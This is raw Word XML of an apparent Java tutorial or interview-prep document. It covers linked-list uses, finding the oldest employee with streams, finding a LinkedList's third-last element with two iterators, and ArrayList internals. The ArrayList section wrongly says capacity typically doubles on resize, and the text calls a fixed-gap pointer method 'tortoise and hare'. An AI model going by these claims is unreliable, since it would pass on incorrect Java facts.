          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BCFCC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current stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B0E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do Stack: " + undoStack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3AF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do Stack: " + redoStack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960CA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3E793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BC18B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mplementing Custom Data Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C8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building a custom data structure like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deque (double-ended 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iority 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be a suitable underlying data structure because it supports fast insertions and deletions at both ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4907F9" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D60CE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953B8F">
          <v:rect id="_x0000_i1494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3D717"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actical Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F5C1C"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 and Stack Implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D4DFA"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bi-directional traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54454550"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o/Redo Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0080F192"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ircular Linked Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for round-robin scheduling or buffering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC029E8"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Efficient Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamic and fluctuating data sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00148825"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Data Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., deque or priority queue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7B0C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p>
    <w:p w14:paraId="5806C5F9"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insertions and deletions at the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5C198"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umber of elements in the list is unknown or frequently changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740996C"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implement queues, stacks, or circular structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF05D4" w14:textId="5499D22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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4C4F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1" w:name="_Toc197867365"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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ompar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objects and return the highest employee age, you can follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5164E"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the Employee class with necessary fields (like name, age, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF54FC1"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to process the list of employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27017968"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function with a custom comparator to find the employee with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B5089"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D9C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30A162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2501341C" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A38CA6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FB975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78E4911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739FFDDE" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDB230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00DCE8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D2CEA7"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34EBD8C"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECAAA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F080F5" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388FF85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for age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06370A6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897FC3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9B3DD8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45DD62" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574AB69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for age (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684ABA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15EE554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34A146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C9EAF" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25608A8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AE0BC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4706520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588642C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BD34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96A22D" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D869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5C9B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CEE6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rrayList of Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D8FA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2EFBC73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0C15630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2B845D7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35));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003070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Charlie", 40));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31A57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A5546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ding the employee with the highest age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A366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oldestEmployee = employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACBF7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x(Comparator.comparingInt(Employee::getAge))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838FF3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null); // In case the list is empty, return null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA46894" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374CD00E"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employee with the highest age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D67E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ldestEmployee != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B477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oldest employee is: " + oldestEmployee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616942D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1E36359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o employees found.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B34C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9193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4B81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D62E6F"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4C00C06"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class has a name and age field with a constructor, getter for age, and a toString() method for easy output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A3442"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> list is populated with a few Employee objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D3A3B0"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along with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to find the employee with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B7D5E"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ator.comparingInt(Employee::getAge)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compares the employees based on their age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33453E3D"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Else(null)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that if the list is empty, we return null instead of throwing an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027181C1"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78B898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ldest employee is: Employee{name='Charlie', age=40}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28C829" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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This solution efficiently compare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employees and retrieves the one with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30BE94" w14:textId="5EB15FC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496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B71A5D" w14:textId="77777777" w:rsidR="00943AB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00943AB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc197867366"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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find the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3rd last element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from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single iteration, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two-pointer technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"tortoise and hare"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method). The idea is to maintain two pointers, where the second pointer </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4093A"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gorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2F4B4"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two pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A024FF7"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starts from the head of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2A7E0"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 starts from the head but is moved </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 steps ahead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEFA7E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> together one step at a time, until the second pointer reaches the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC7D81"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will then point to the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F78D84"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54FCB7A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E1E4C11" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B59368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8E2A7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1000B7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LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3E3B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B02B7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4247485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43AE7E4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182F59B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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92695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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE146D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66899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function to find 3rd last element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB8E1E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thirdLast = findThirdLastElement(list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE834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BE1AA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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31120C0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rdLast != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6456C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3rd last element is: " + thirdLast);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061581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417D881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is too small to have a 3rd last element.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA4EAC"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08C31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307849" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42834DD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unction to find the 3rd last element in a LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D988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Integer findThirdLastElement(LinkedList&lt;Integer&gt; list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E15D1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list == null || list.size() &lt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC2FD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Return null if the list has less than 3 elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B841CB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4DF7D0" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1828B8E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wo pointers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A8E0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first = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60374BA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second = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F2169" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109192C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ve the second pointer 3 steps ahead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7FF9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3; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5C31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econd.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA909E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22EE2C5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274F9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24E264" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0DF95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move both pointers until second reaches the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022223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second.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9544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rst.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3BD2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1DDD68E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E1B91" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0244659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The first pointer will now be at the 3rd last element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB0D0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irst.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EB87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6729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BDB02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11C33E6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF9C9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an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traverse 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Both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s are initialized with the iterator of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36279391"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ce the second pointer by 3 steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754FBEE"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move the second pointer 3 steps ahead so that when it reaches the end of the list, the first pointer will be exactly at the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025197F5"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 simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F31D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second pointer is 3 steps ahead, we move both pointers one step at a time. When the second pointer reaches the end of the list, the first pointer will be at the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668333F"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he 3rd last element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682A118"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p, the first pointer points to the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B122D"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A516D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3rd last element is: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B50A3"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A015F26" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 The list is traversed only once, so it’s efficient for large lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABF7C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0D4DE910" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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as we are using only two pointers and no extra space other than the input list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2B4C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allows you to find the 3rd last element in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the list, making it efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DA889" w14:textId="5B5584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497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F23673"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3" w:name="_Toc197867367"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList internally work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="05AFA4EF" w14:textId="2374E543" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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backed by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It provides an implementation of th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Internally Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65F27B"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Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18143359"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n array to store elements. When you create an ArrayList, it initializes an array (usually with an initial capacity of 10 elements by default) to store the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02AEE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDB2E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has a dynamic resizing mechanism. When the array is full and a new element needs to be added, the ArrayList automatically resizes its internal array by increasing its capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C45A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the capacity is doubled when the array is full, but this can be changed (e.g., by specifying an initial capacity during ArrayList creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEB92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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A20307"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resizing occurs, a new array is created with the new capacity (e.g., twice the original size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B1908"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lements of the old array are copied into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC1A8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resizing operation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w:t>
      </w:r>
    </w:p>
